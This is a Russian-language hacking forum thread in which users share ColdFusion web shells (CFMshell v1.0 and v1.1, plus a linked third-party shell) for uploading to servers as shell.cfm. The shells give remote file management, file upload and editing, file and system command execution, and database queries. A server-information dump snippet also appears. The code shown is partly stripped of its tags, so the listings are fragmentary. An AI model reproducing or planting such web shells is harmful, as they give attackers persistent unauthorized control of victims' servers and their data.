Облазив интернет в поисках cfm шелла, я так и не нашел ничего кроме одного шелла, который я думаю все знают: это шелл в котором можно запустить файл. Но в моём случае нельзя было запустить файлы, поэтому пришлось писать свой шелл.

CFMshell v. 1.0

- файлменеджер(удаление, переинование файлов/директорий, создание директорий)

- редактирование файлов

- заливка файлов

- запуск файлов

http://pastebin.com/hKS5k792


Code:

td {border:1px solid black;}
table {border-collapse: collapse;}
#header {background-color: black;color:white;}
#header td { border-color:white; }
a {color:black}














































#sc#

Current dirvalue = "#CP#" >
Upload file
Create dir

Filename to exec:#CP#">
Options:

NameSizeTypeModifiedAttrModeAction
[..]

[#directories.name#]
#directories.size#
#directories.type#
#directories.dateLastModified#
#directories.attributes#
#directories.mode#
D   R

#files.name#
#files.size#
#files.type#
#files.dateLastModified#
#files.attributes#
#files.mode#
D   R

#CP#">

#Fcont#

Save#getDirectoryFromPath(CP)#';document.frm.submi t();">Back


З.Ы. сильно не пинайте, ибо coldfusion я не знаю совсем

лучше чем ничего, молодец

CFMshell v. 1.1

- устранил баг со слеширование на windows платформе(крокозяблы получались всякие)

- устарнил баг с просмотром файлов, если в них есть textarea

- добавил возможно разархивирования zip-архивов(CF 8+ если не ошибаюсь)

- сделал более приятный интерфейс

_http://pastebin.com/pu04UCq9


Code:

#rounded-corner {font-family: "Lucida Sans Unicode", "Lucida Grande", Sans-Serif;font-size: 12px;width: 100%;text-align: left;border-collapse: collapse;}
#current-path {font-family: "Lucida Sans Unicode", "Lucida Grande", Sans-Serif;font-size: 12px;width: 100%;text-align: left;border-collapse: collapse;margin:0px;margin-bottom:2px;padding:10px 0px;background:#b9c9fe}
#rounded-corner thead th.rounded-q1 {background: #b9c9fe;}
#rounded-corner thead th.rounded-q4 {background: #b9c9fe;width:100px}
#rounded-corner th {padding: 8px;font-weight: normal;font-size: 13px;color: #039;background: #b9c9fe;}
#rounded-corner td {padding: 8px;background: #e8edff;border-top: 1px solid #fff;color: #669;}
#rounded-corner tbody tr:hover td {background: #d0dafd;}
a {color:black}




















































#sc#

Current dirvalue = "#CP#" >
Upload file
Create dir

Filename to exec#CP#">
Options

Zip archive#CP#">
Folder to unpack#CP#">

NameSizeTypeModifiedAttributesModeAction
[..]

[#directories.name#]
#directories.size#
#directories.type#
#directories.dateLastModified#
#directories.attributes#
#directories.mode#
Del   Rnm

#files.name#
#files.size#
#files.type#
#files.dateLastModified#
#files.attributes#
#files.mode#
Del   Rnm

#CP#

#CP#">

#HTMLEditFormat(Fcont)#

Save#getDirectoryFromPath(CP)#';document.frm.submi t();" style="width:100px">Back

Объясните как юзать его)?

эмм... а что непонятного? cfm -> coldfusion -> заливаем аля shell.cfm и юзаем

аналогия: php->php->заливаем wso2.php (https://antichat.live/threads/103155/) и юзаем

вывод информации о сервере(пока всё что нашёл)


Code:

CGI server variable
SERVER_SOFTWARE#CGI.SERVER_SOFTWARE#
SERVER_NAME#CGI.SERVER_NAME#
GATEWAY_INTERFACE#GATEWAY_INTERFACE#
SERVER_PROTOCOL#CGI.SERVER_PROTOCOL#
SERVER_PORT#CGI.SERVER_PORT#
REQUEST_METHOD#CGI.REQUEST_METHOD#
PATH_INFO#CGI.PATH_INFO#
PATH_TRANSLATED#CGI.PATH_TRANSLATED#
SCRIPT_NAME#CGI.SCRIPT_NAME#
QUERY_STRING#CGI.QUERY_STRING#
REMOTE_HOST#CGI.REMOTE_HOST#
REMOTE_ADDR#CGI.REMOTE_ADDR#
AUTH_TYPE#CGI.AUTH_TYPE#
REMOTE_USER#CGI.REMOTE_USER#
AUTH_USER#CGI.AUTH_USER#
REMOTE_IDENT#CGI.REMOTE_IDENT#
CONTENT_TYPE#CGI.CONTENT_TYPE#
CONTENT_LENGTH#CGI.CONTENT_LENGTH#
Server variables
Product Name#Server.ColdFusion.ProductName#
Product Level#Server.ColdFusion.ProductLevel#
Supported Locales#Server.ColdFusion.SupportedLocales#
OS Name#Server.OS.Name#
OS Additional Information#Server.OS.AdditionalInformation#
OS Version#Server.OS.Version#
OS BuildNumber#Server.OS.BuildNumber#

Мне кажется проще использовать asp шелл, т.к. 90% coldfusion стоит на Windows платформах на которых крутится IIS (который без особых усилий работает с asp). Оставшиеся 10% стоят на linux из под apache и как это часто бывает с установленным php интерпретатором.

А вообще молодец, может и пригодится.

нашел очень неплохой шелл на cfm, автор "Sebastien Denis"

файловый менеджер, выполнение системных команд, выполнение запросов к базе. очень удобно вобщем. дерзайте

http://pastebin.com/jk9HPX3A